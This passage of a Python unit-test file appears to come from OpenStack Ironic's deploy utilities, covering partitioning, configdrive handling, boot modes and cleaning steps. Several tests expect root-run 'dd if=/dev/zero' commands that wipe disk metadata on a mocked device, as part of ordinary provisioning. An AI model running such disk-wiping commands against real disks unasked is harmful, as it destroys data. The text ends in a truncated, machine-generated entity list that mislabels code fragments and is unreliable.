self.assertEqual(expected, result)
def test_parse_root_device_hints_string_space(self):
self.node.properties['root_device'] = {'model': 'fake model'}
expected = 'model=fake%20model'
result = utils.parse_root_device_hints(self.node)
self.assertEqual(expected, result)
def test_parse_root_device_hints_no_hints(self):
self.node.properties = {}
result = utils.parse_root_device_hints(self.node)
self.assertIsNone(result)
def test_parse_root_device_hints_invalid_hints(self):
self.node.properties['root_device'] = {'vehicle': 'Owlship'}
self.assertRaises(exception.InvalidParameterValue,
utils.parse_root_device_hints, self.node)
def test_parse_root_device_hints_invalid_size(self):
self.node.properties['root_device'] = {'size': 'not-int'}
self.assertRaises(exception.InvalidParameterValue,
utils.parse_root_device_hints, self.node)
@mock.patch.object(disk_partitioner.DiskPartitioner, 'commit', lambda _: None)
class WorkOnDiskTestCase(tests_base.TestCase):
def setUp(self):
super(WorkOnDiskTestCase, self).setUp()
self.image_path = '/tmp/xyz/image'
self.root_mb = 128
self.swap_mb = 64
self.ephemeral_mb = 0
self.ephemeral_format = None
self.configdrive_mb = 0
self.dev = '/dev/fake'
self.swap_part = '/dev/fake-part1'
self.root_part = '/dev/fake-part2'
self.mock_ibd_obj = mock.patch.object(
utils, 'is_block_device', autospec=True)
self.mock_ibd = self.mock_ibd_obj.start()
self.addCleanup(self.mock_ibd_obj.stop)
self.mock_mp_obj = mock.patch.object(
utils, 'make_partitions', autospec=True)
self.mock_mp = self.mock_mp_obj.start()
self.addCleanup(self.mock_mp_obj.stop)
self.mock_remlbl_obj = mock.patch.object(
utils, 'destroy_disk_metadata', autospec=True)
self.mock_remlbl = self.mock_remlbl_obj.start()
self.addCleanup(self.mock_remlbl_obj.stop)
self.mock_mp.return_value = {'swap': self.swap_part,
'root': self.root_part}
def test_no_root_partition(self):
self.mock_ibd.return_value = False
self.assertRaises(exception.InstanceDeployFailure,
utils.work_on_disk, self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.ephemeral_format, self.image_path, 'fake-uuid')
self.mock_ibd.assert_called_once_with(self.root_part)
self.mock_mp.assert_called_once_with(self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.configdrive_mb, commit=True,
boot_option="netboot",
boot_mode="bios")
def test_no_swap_partition(self):
self.mock_ibd.side_effect = iter([True, False])
calls = [mock.call(self.root_part),
mock.call(self.swap_part)]
self.assertRaises(exception.InstanceDeployFailure,
utils.work_on_disk, self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.ephemeral_format, self.image_path, 'fake-uuid')
self.assertEqual(self.mock_ibd.call_args_list, calls)
self.mock_mp.assert_called_once_with(self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.configdrive_mb, commit=True,
boot_option="netboot",
boot_mode="bios")
def test_no_ephemeral_partition(self):
ephemeral_part = '/dev/fake-part1'
swap_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
ephemeral_mb = 256
ephemeral_format = 'exttest'
self.mock_mp.return_value = {'ephemeral': ephemeral_part,
'swap': swap_part,
'root': root_part}
self.mock_ibd.side_effect = iter([True, True, False])
calls = [mock.call(root_part),
mock.call(swap_part),
mock.call(ephemeral_part)]
self.assertRaises(exception.InstanceDeployFailure,
utils.work_on_disk, self.dev, self.root_mb,
self.swap_mb, ephemeral_mb, ephemeral_format,
self.image_path, 'fake-uuid')
self.assertEqual(self.mock_ibd.call_args_list, calls)
self.mock_mp.assert_called_once_with(self.dev, self.root_mb,
self.swap_mb, ephemeral_mb,
self.configdrive_mb, commit=True,
boot_option="netboot",
boot_mode="bios")
@mock.patch.object(common_utils, 'unlink_without_raise', autospec=True)
@mock.patch.object(utils, '_get_configdrive', autospec=True)
def test_no_configdrive_partition(self, mock_configdrive, mock_unlink):
mock_configdrive.return_value = (10, 'fake-path')
swap_part = '/dev/fake-part1'
configdrive_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
configdrive_url = 'http://127.0.0.1/cd'
configdrive_mb = 10
self.mock_mp.return_value = {'swap': swap_part,
'configdrive': configdrive_part,
'root': root_part}
self.mock_ibd.side_effect = iter([True, True, False])
calls = [mock.call(root_part),
mock.call(swap_part),
mock.call(configdrive_part)]
self.assertRaises(exception.InstanceDeployFailure,
utils.work_on_disk, self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.ephemeral_format, self.image_path, 'fake-uuid',
preserve_ephemeral=False,
configdrive=configdrive_url,
boot_option="netboot")
self.assertEqual(self.mock_ibd.call_args_list, calls)
self.mock_mp.assert_called_once_with(self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
configdrive_mb, commit=True,
boot_option="netboot",
boot_mode="bios")
mock_unlink.assert_called_once_with('fake-path')
@mock.patch.object(common_utils, 'execute', autospec=True)
class MakePartitionsTestCase(tests_base.TestCase):
def setUp(self):
super(MakePartitionsTestCase, self).setUp()
self.dev = 'fake-dev'
self.root_mb = 1024
self.swap_mb = 512
self.ephemeral_mb = 0
self.configdrive_mb = 0
self.parted_static_cmd = ['parted', '-a', 'optimal', '-s', self.dev,
'--', 'unit', 'MiB', 'mklabel', 'msdos']
def _test_make_partitions(self, mock_exc, boot_option):
mock_exc.return_value = (None, None)
utils.make_partitions(self.dev, self.root_mb, self.swap_mb,
self.ephemeral_mb, self.configdrive_mb,
boot_option=boot_option)
expected_mkpart = ['mkpart', 'primary', 'linux-swap', '1', '513',
'mkpart', 'primary', '', '513', '1537']
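        # Offsets are MiB boundaries: swap occupies [1, 513) = 512 MiB and
        # root [513, 1537) = 1024 MiB, matching self.swap_mb and self.root_mb.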
if boot_option == "local":
expected_mkpart.extend(['set', '2', 'boot', 'on'])
parted_cmd = self.parted_static_cmd + expected_mkpart
parted_call = mock.call(*parted_cmd, run_as_root=True,
check_exit_code=[0])
fuser_cmd = ['fuser', 'fake-dev']
fuser_call = mock.call(*fuser_cmd, run_as_root=True,
check_exit_code=[0, 1])
mock_exc.assert_has_calls([parted_call, fuser_call])
def test_make_partitions(self, mock_exc):
self._test_make_partitions(mock_exc, boot_option="netboot")
def test_make_partitions_local_boot(self, mock_exc):
self._test_make_partitions(mock_exc, boot_option="local")
def test_make_partitions_with_ephemeral(self, mock_exc):
self.ephemeral_mb = 2048
expected_mkpart = ['mkpart', 'primary', '', '1', '2049',
'mkpart', 'primary', 'linux-swap', '2049', '2561',
'mkpart', 'primary', '', '2561', '3585']
cmd = self.parted_static_cmd + expected_mkpart
mock_exc.return_value = (None, None)
utils.make_partitions(self.dev, self.root_mb, self.swap_mb,
self.ephemeral_mb, self.configdrive_mb)
parted_call = mock.call(*cmd, run_as_root=True, check_exit_code=[0])
mock_exc.assert_has_calls([parted_call])
@mock.patch.object(utils, 'get_dev_block_size', autospec=True)
@mock.patch.object(common_utils, 'execute', autospec=True)
class DestroyMetaDataTestCase(tests_base.TestCase):
def setUp(self):
super(DestroyMetaDataTestCase, self).setUp()
self.dev = 'fake-dev'
self.node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
def test_destroy_disk_metadata(self, mock_exec, mock_gz):
mock_gz.return_value = 64
expected_calls = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev',
'bs=512', 'count=36', run_as_root=True,
check_exit_code=[0]),
mock.call('dd', 'if=/dev/zero', 'of=fake-dev',
'bs=512', 'count=36', 'seek=28',
run_as_root=True,
check_exit_code=[0])]
utils.destroy_disk_metadata(self.dev, self.node_uuid)
mock_exec.assert_has_calls(expected_calls)
self.assertTrue(mock_gz.called)
def test_destroy_disk_metadata_get_dev_size_fail(self, mock_exec, mock_gz):
mock_gz.side_effect = processutils.ProcessExecutionError
expected_call = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev',
'bs=512', 'count=36', run_as_root=True,
check_exit_code=[0])]
self.assertRaises(processutils.ProcessExecutionError,
utils.destroy_disk_metadata,
self.dev,
self.node_uuid)
mock_exec.assert_has_calls(expected_call)
def test_destroy_disk_metadata_dd_fail(self, mock_exec, mock_gz):
mock_exec.side_effect = processutils.ProcessExecutionError
expected_call = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev',
'bs=512', 'count=36', run_as_root=True,
check_exit_code=[0])]
self.assertRaises(processutils.ProcessExecutionError,
utils.destroy_disk_metadata,
self.dev,
self.node_uuid)
mock_exec.assert_has_calls(expected_call)
self.assertFalse(mock_gz.called)
@mock.patch.object(common_utils, 'execute', autospec=True)
class GetDeviceBlockSizeTestCase(tests_base.TestCase):
def setUp(self):
super(GetDeviceBlockSizeTestCase, self).setUp()
self.dev = 'fake-dev'
self.node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
def test_get_dev_block_size(self, mock_exec):
mock_exec.return_value = ("64", "")
expected_call = [mock.call('blockdev', '--getsz', self.dev,
run_as_root=True, check_exit_code=[0])]
utils.get_dev_block_size(self.dev)
mock_exec.assert_has_calls(expected_call)
@mock.patch.object(utils, 'dd', autospec=True)
@mock.patch.object(images, 'qemu_img_info', autospec=True)
@mock.patch.object(images, 'convert_image', autospec=True)
class PopulateImageTestCase(tests_base.TestCase):
def setUp(self):
super(PopulateImageTestCase, self).setUp()
def test_populate_raw_image(self, mock_cg, mock_qinfo, mock_dd):
type(mock_qinfo.return_value).file_format = mock.PropertyMock(
return_value='raw')
utils.populate_image('src', 'dst')
mock_dd.assert_called_once_with('src', 'dst')
self.assertFalse(mock_cg.called)
def test_populate_qcow2_image(self, mock_cg, mock_qinfo, mock_dd):
type(mock_qinfo.return_value).file_format = mock.PropertyMock(
return_value='qcow2')
utils.populate_image('src', 'dst')
mock_cg.assert_called_once_with('src', 'dst', 'raw', True)
self.assertFalse(mock_dd.called)
@mock.patch.object(utils, 'is_block_device', lambda d: True)
@mock.patch.object(utils, 'block_uuid', lambda p: 'uuid')
@mock.patch.object(utils, 'dd', lambda *_: None)
@mock.patch.object(images, 'convert_image', lambda *_: None)
@mock.patch.object(common_utils, 'mkfs', lambda *_: None)
# NOTE(dtantsur): destroy_disk_metadata resets file size, disabling it
@mock.patch.object(utils, 'destroy_disk_metadata', lambda *_: None)
class RealFilePartitioningTestCase(tests_base.TestCase):
"""This test applies some real-world partitioning scenario to a file.
This test covers the whole partitioning, mocking everything not possible
on a file. That helps us assure, that we do all partitioning math properly
and also conducts integration testing of DiskPartitioner.
"""
def setUp(self):
super(RealFilePartitioningTestCase, self).setUp()
# NOTE(dtantsur): no parted utility on gate-ironic-python26
try:
common_utils.execute('parted', '--version')
except OSError as exc:
self.skipTest('parted utility was not found: %s' % exc)
self.file = tempfile.NamedTemporaryFile(delete=False)
# NOTE(ifarkas): the file needs to be closed, so fuser won't report
# any usage
self.file.close()
# NOTE(dtantsur): 20 MiB file with zeros
common_utils.execute('dd', 'if=/dev/zero', 'of=%s' % self.file.name,
'bs=1', 'count=0', 'seek=20MiB')
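        # count=0 with seek=20MiB writes no data but extends the file to
        # 20 MiB, i.e. it creates a sparse 20 MiB file.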
@staticmethod
def _run_without_root(func, *args, **kwargs):
"""Make sure root is not required when using utils.execute."""
real_execute = common_utils.execute
def fake_execute(*cmd, **kwargs):
kwargs['run_as_root'] = False
return real_execute(*cmd, **kwargs)
with mock.patch.object(common_utils, 'execute', fake_execute):
return func(*args, **kwargs)
def test_different_sizes(self):
# NOTE(dtantsur): Keep this list in order with expected partitioning
fields = ['ephemeral_mb', 'swap_mb', 'root_mb']
variants = ((0, 0, 12), (4, 2, 8), (0, 4, 10), (5, 0, 10))
for variant in variants:
kwargs = dict(zip(fields, variant))
self._run_without_root(utils.work_on_disk, self.file.name,
ephemeral_format='ext4', node_uuid='',
image_path='path', **kwargs)
part_table = self._run_without_root(
disk_partitioner.list_partitions, self.file.name)
for part, expected_size in zip(part_table, filter(None, variant)):
self.assertEqual(expected_size, part['size'],
"comparison failed for %s" % list(variant))
def test_whole_disk(self):
# 6 MiB ephemeral + 3 MiB swap + 9 MiB root + 1 MiB for MBR
# + 1 MiB MAGIC == 20 MiB whole disk
        # TODO(dtantsur): figure out why we need 'magic' 1 more MiB
        # and why it differs between Ubuntu and Fedora (see below)
self._run_without_root(utils.work_on_disk, self.file.name,
root_mb=9, ephemeral_mb=6, swap_mb=3,
ephemeral_format='ext4', node_uuid='',
image_path='path')
part_table = self._run_without_root(
disk_partitioner.list_partitions, self.file.name)
sizes = [part['size'] for part in part_table]
# NOTE(dtantsur): parted in Ubuntu 12.04 will occupy the last MiB,
# parted in Fedora 20 won't - thus two possible variants for last part
self.assertEqual([6, 3], sizes[:2],
"unexpected partitioning %s" % part_table)
self.assertIn(sizes[2], (9, 10))
@mock.patch.object(image_cache, 'clean_up_caches', autospec=True)
def test_fetch_images(self, mock_clean_up_caches):
mock_cache = mock.MagicMock(
spec_set=['fetch_image', 'master_dir'], master_dir='master_dir')
utils.fetch_images(None, mock_cache, [('uuid', 'path')])
mock_clean_up_caches.assert_called_once_with(None, 'master_dir',
[('uuid', 'path')])
mock_cache.fetch_image.assert_called_once_with('uuid', 'path',
ctx=None,
force_raw=True)
@mock.patch.object(image_cache, 'clean_up_caches', autospec=True)
def test_fetch_images_fail(self, mock_clean_up_caches):
exc = exception.InsufficientDiskSpace(path='a',
required=2,
actual=1)
mock_cache = mock.MagicMock(
spec_set=['master_dir'], master_dir='master_dir')
mock_clean_up_caches.side_effect = iter([exc])
self.assertRaises(exception.InstanceDeployFailure,
utils.fetch_images,
None,
mock_cache,
[('uuid', 'path')])
mock_clean_up_caches.assert_called_once_with(None, 'master_dir',
[('uuid', 'path')])
@mock.patch.object(shutil, 'copyfileobj', autospec=True)
@mock.patch.object(requests, 'get', autospec=True)
class GetConfigdriveTestCase(tests_base.TestCase):
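    # _get_configdrive() accepts either an HTTP(S) URL or a raw base64
    # string; in both cases the payload is base64-decoded, gunzipped and
    # copied out to a local configdrive file.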
@mock.patch.object(gzip, 'GzipFile', autospec=True)
def test_get_configdrive(self, mock_gzip, mock_requests, mock_copy):
mock_requests.return_value = mock.MagicMock(
spec_set=['content'], content='Zm9vYmFy')
utils._get_configdrive('http://127.0.0.1/cd', 'fake-node-uuid')
mock_requests.assert_called_once_with('http://127.0.0.1/cd')
mock_gzip.assert_called_once_with('configdrive', 'rb',
fileobj=mock.ANY)
mock_copy.assert_called_once_with(mock.ANY, mock.ANY)
@mock.patch.object(gzip, 'GzipFile', autospec=True)
def test_get_configdrive_base64_string(self, mock_gzip, mock_requests,
mock_copy):
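        # 'Zm9vYmFy' is base64 for 'foobar'; passing it directly exercises
        # the non-URL code path, so no HTTP request must be made.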
utils._get_configdrive('Zm9vYmFy', 'fake-node-uuid')
self.assertFalse(mock_requests.called)
mock_gzip.assert_called_once_with('configdrive', 'rb',
fileobj=mock.ANY)
mock_copy.assert_called_once_with(mock.ANY, mock.ANY)
def test_get_configdrive_bad_url(self, mock_requests, mock_copy):
mock_requests.side_effect = requests.exceptions.RequestException
self.assertRaises(exception.InstanceDeployFailure,
utils._get_configdrive, 'http://127.0.0.1/cd',
'fake-node-uuid')
self.assertFalse(mock_copy.called)
@mock.patch.object(base64, 'b64decode', autospec=True)
def test_get_configdrive_base64_error(self, mock_b64, mock_requests,
mock_copy):
mock_b64.side_effect = TypeError
self.assertRaises(exception.InstanceDeployFailure,
utils._get_configdrive,
'malformed', 'fake-node-uuid')
mock_b64.assert_called_once_with('malformed')
self.assertFalse(mock_copy.called)
@mock.patch.object(gzip, 'GzipFile', autospec=True)
def test_get_configdrive_gzip_error(self, mock_gzip, mock_requests,
mock_copy):
mock_requests.return_value = mock.MagicMock(
spec_set=['content'], content='Zm9vYmFy')
mock_copy.side_effect = IOError
self.assertRaises(exception.InstanceDeployFailure,
utils._get_configdrive, 'http://127.0.0.1/cd',
'fake-node-uuid')
mock_requests.assert_called_once_with('http://127.0.0.1/cd')
mock_gzip.assert_called_once_with('configdrive', 'rb',
fileobj=mock.ANY)
mock_copy.assert_called_once_with(mock.ANY, mock.ANY)
class VirtualMediaDeployUtilsTestCase(db_base.DbTestCase):
def setUp(self):
super(VirtualMediaDeployUtilsTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="iscsi_ilo")
info_dict = db_utils.get_test_ilo_info()
self.node = obj_utils.create_test_node(self.context,
driver='iscsi_ilo', driver_info=info_dict)
def test_get_single_nic_with_vif_port_id(self):
obj_utils.create_test_port(self.context, node_id=self.node.id,
address='aa:bb:cc', uuid=uuidutils.generate_uuid(),
extra={'vif_port_id': 'test-vif-A'}, driver='iscsi_ilo')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
address = utils.get_single_nic_with_vif_port_id(task)
self.assertEqual('aa:bb:cc', address)
class ParseInstanceInfoCapabilitiesTestCase(tests_base.TestCase):
def setUp(self):
super(ParseInstanceInfoCapabilitiesTestCase, self).setUp()
self.node = obj_utils.get_test_node(self.context, driver='fake')
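    # The 'capabilities' entry may arrive either as a JSON-encoded string or
    # as a dict; parse_instance_info_capabilities must accept both forms.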
def test_parse_instance_info_capabilities_string(self):
self.node.instance_info = {'capabilities': '{"cat": "meow"}'}
expected_result = {"cat": "meow"}
result = utils.parse_instance_info_capabilities(self.node)
self.assertEqual(expected_result, result)
def test_parse_instance_info_capabilities(self):
self.node.instance_info = {'capabilities': {"dog": "wuff"}}
expected_result = {"dog": "wuff"}
result = utils.parse_instance_info_capabilities(self.node)
self.assertEqual(expected_result, result)
def test_parse_instance_info_invalid_type(self):
self.node.instance_info = {'capabilities': 'not-a-dict'}
self.assertRaises(exception.InvalidParameterValue,
utils.parse_instance_info_capabilities, self.node)
def test_is_secure_boot_requested_true(self):
self.node.instance_info = {'capabilities': {"secure_boot": "tRue"}}
self.assertTrue(utils.is_secure_boot_requested(self.node))
def test_is_secure_boot_requested_false(self):
self.node.instance_info = {'capabilities': {"secure_boot": "false"}}
self.assertFalse(utils.is_secure_boot_requested(self.node))
def test_is_secure_boot_requested_invalid(self):
self.node.instance_info = {'capabilities': {"secure_boot": "invalid"}}
self.assertFalse(utils.is_secure_boot_requested(self.node))
def test_get_boot_mode_for_deploy_using_capabilities(self):
properties = {'capabilities': 'boot_mode:uefi,cap2:value2'}
self.node.properties = properties
result = utils.get_boot_mode_for_deploy(self.node)
self.assertEqual('uefi', result)
def test_get_boot_mode_for_deploy_using_instance_info_cap(self):
instance_info = {'capabilities': {'secure_boot': 'True'}}
self.node.instance_info = instance_info
result = utils.get_boot_mode_for_deploy(self.node)
self.assertEqual('uefi', result)
def test_get_boot_mode_for_deploy_using_instance_info(self):
instance_info = {'deploy_boot_mode': 'bios'}
self.node.instance_info = instance_info
result = utils.get_boot_mode_for_deploy(self.node)
self.assertEqual('bios', result)
class TrySetBootDeviceTestCase(db_base.DbTestCase):
def setUp(self):
super(TrySetBootDeviceTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake")
self.node = obj_utils.create_test_node(self.context, driver="fake")
@mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True)
def test_try_set_boot_device_okay(self, node_set_boot_device_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
utils.try_set_boot_device(task, boot_devices.DISK,
persistent=True)
node_set_boot_device_mock.assert_called_once_with(
task, boot_devices.DISK, persistent=True)
@mock.patch.object(utils, 'LOG', autospec=True)
@mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True)
def test_try_set_boot_device_ipmifailure_uefi(self,
node_set_boot_device_mock, log_mock):
self.node.properties = {'capabilities': 'boot_mode:uefi'}
self.node.save()
node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd='a')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
utils.try_set_boot_device(task, boot_devices.DISK,
persistent=True)
node_set_boot_device_mock.assert_called_once_with(
task, boot_devices.DISK, persistent=True)
log_mock.warning.assert_called_once_with(mock.ANY)
@mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True)
def test_try_set_boot_device_ipmifailure_bios(
self, node_set_boot_device_mock):
node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd='a')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.assertRaises(exception.IPMIFailure,
utils.try_set_boot_device,
task, boot_devices.DISK, persistent=True)
node_set_boot_device_mock.assert_called_once_with(
task, boot_devices.DISK, persistent=True)
@mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True)
def test_try_set_boot_device_some_other_exception(
self, node_set_boot_device_mock):
exc = exception.IloOperationError(operation="qwe", error="error")
node_set_boot_device_mock.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.assertRaises(exception.IloOperationError,
utils.try_set_boot_device,
task, boot_devices.DISK, persistent=True)
node_set_boot_device_mock.assert_called_once_with(
task, boot_devices.DISK, persistent=True)
class AgentCleaningTestCase(db_base.DbTestCase):
def setUp(self):
super(AgentCleaningTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
n = {'driver': 'fake_agent',
'driver_internal_info': {'agent_url': 'http://127.0.0.1:9999'}}
self.node = obj_utils.create_test_node(self.context, **n)
self.ports = [obj_utils.create_test_port(self.context,
node_id=self.node.id)]
self.clean_steps = {
'hardware_manager_version': '1',
'clean_steps': {
'GenericHardwareManager': [
{'interface': 'deploy',
'step': 'erase_devices',
'priority': 20},
],
'SpecificHardwareManager': [
{'interface': 'deploy',
'step': 'update_firmware',
'priority': 30},
{'interface': 'raid',
'step': 'create_raid',
'priority': 10},
]
}
}
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'get_clean_steps',
autospec=True)
def test_get_clean_steps(self, client_mock, list_ports_mock):
client_mock.return_value = {
'command_result': self.clean_steps}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
response = utils.agent_get_clean_steps(task)
client_mock.assert_called_once_with(mock.ANY, task.node,
self.ports)
self.assertEqual('1', task.node.driver_internal_info[
'hardware_manager_version'])
# Since steps are returned in dicts, they have non-deterministic
# ordering
self.assertEqual(2, len(response))
self.assertIn(self.clean_steps['clean_steps'][
'GenericHardwareManager'][0], response)
self.assertIn(self.clean_steps['clean_steps'][
'SpecificHardwareManager'][0], response)
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'get_clean_steps',
autospec=True)
def test_get_clean_steps_missing_steps(self, client_mock,
list_ports_mock):
del self.clean_steps['clean_steps']
client_mock.return_value = {
'command_result': self.clean_steps}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.assertRaises(exception.NodeCleaningFailure,
utils.agent_get_clean_steps,
task)
client_mock.assert_called_once_with(mock.ANY, task.node,
self.ports)
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'execute_clean_step',
autospec=True)
def test_execute_clean_step(self, client_mock, list_ports_mock):
client_mock.return_value = {
'command_status': 'SUCCEEDED'}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
response = utils.agent_execute_clean_step(
task,
self.clean_steps['clean_steps']['GenericHardwareManager'][0])
self.assertEqual(states.CLEANING, response)
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'execute_clean_step',
autospec=True)
def test_execute_clean_step_running(self, client_mock, list_ports_mock):
client_mock.return_value = {
'command_status': 'RUNNING'}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
response = utils.agent_execute_clean_step(
task,
self.clean_steps['clean_steps']['GenericHardwareManager'][0])
self.assertEqual(states.CLEANING, response)
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'execute_clean_step',
autospec=True)
def test_execute_clean_step_version_mismatch(self, client_mock,
list_ports_mock):
client_mock.return_value = {
'command_status': 'RUNNING'}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
response = utils.agent_execute_clean_step(
task,
self.clean_steps['clean_steps']['GenericHardwareManager'][0])
self.assertEqual(states.CLEANING, response)
@mock.patch.object(utils, 'is_block_device', autospec=True)
@mock.patch.object(utils, 'login_iscsi', lambda *_: None)
@mock.patch.object(utils, 'discovery', lambda *_: None)
@mock.patch.object(utils, 'logout_iscsi', lambda *_: None)
@mock.patch.object(utils, 'delete_iscsi', lambda *_: None)
@mock.patch.object(utils, 'get_dev', lambda *_: '/dev/fake')
class ISCSISetupAndHandleErrorsTestCase(tests_base.TestCase):
def test_no_parent_device(self, mock_ibd):
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
mock_ibd.return_value = False
expected_dev = '/dev/fake'
with testtools.ExpectedException(exception.InstanceDeployFailure):
with utils._iscsi_setup_and_handle_errors(
address, port, iqn, lun) as dev:
self.assertEqual(expected_dev, dev)
mock_ibd.assert_called_once_with(expected_dev)
def test_parent_device_yield(self, mock_ibd):
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
expected_dev = '/dev/fake'
mock_ibd.return_value = True
with utils._iscsi_setup_and_handle_errors(address, port,
iqn, lun) as dev:
self.assertEqual(expected_dev, dev)
mock_ibd.assert_called_once_with(expected_dev)
| 75,381 | [['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['DATE_TIME', '2012'], ['DATE_TIME', '2011'], ['DATE_TIME', '2011'], ['PERSON', 'Ilya Alekseyev'], ['LOCATION', 'TestCase'], ['PERSON', 'MagicMock(spec='], ['NRP', 'zip(mock_list'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'mock.call.mkfs(dev=ephemeral_part'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'unlink_without_raise'], ['PERSON', 'autospec=True'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['URL', 'mock.ca'], ['URL', 'mock.call.ma'], ['LOCATION', 'root_mb'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'unlink.as'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['NRP', 'lun'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'mock_os.assert_called_once_with(check_dir'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'mock_update'], ['PERSON', 'MagicMock(spec='], ['NRP', 'zip(mock_list'], ['LOCATION', 'mock.call.work_on_disk(dev'], ['LOCATION', 'root_mb'], ['LOCATION', 'TestCase'], ['PERSON', 'fname'], ['URL', 'self.ad'], ['LOCATION', 'super(OtherFunctionTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['DATE_TIME', 'test_parse_root_device_hints(self'], ['LOCATION', 'utils.parse_root_device_hints'], ['LOCATION', 'utils.parse_root_device_hints'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(WorkOnDiskTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['PERSON', 'root_part'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['PERSON', 'unlink_without_raise'], ['PERSON', 'autospec=True'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['URL', 'configdrive.re'], ['PERSON', 'root_part'], ['LOCATION', 'self.root_mb'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['LOCATION', 'self.root_mb'], ['URL', 'unlink.as'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(MakePartitionsTestCase'], ['LOCATION', 'self.root_mb'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'self.root_mb'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(DestroyMetaDataTestCase'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'mock_exec'], ['PERSON', 
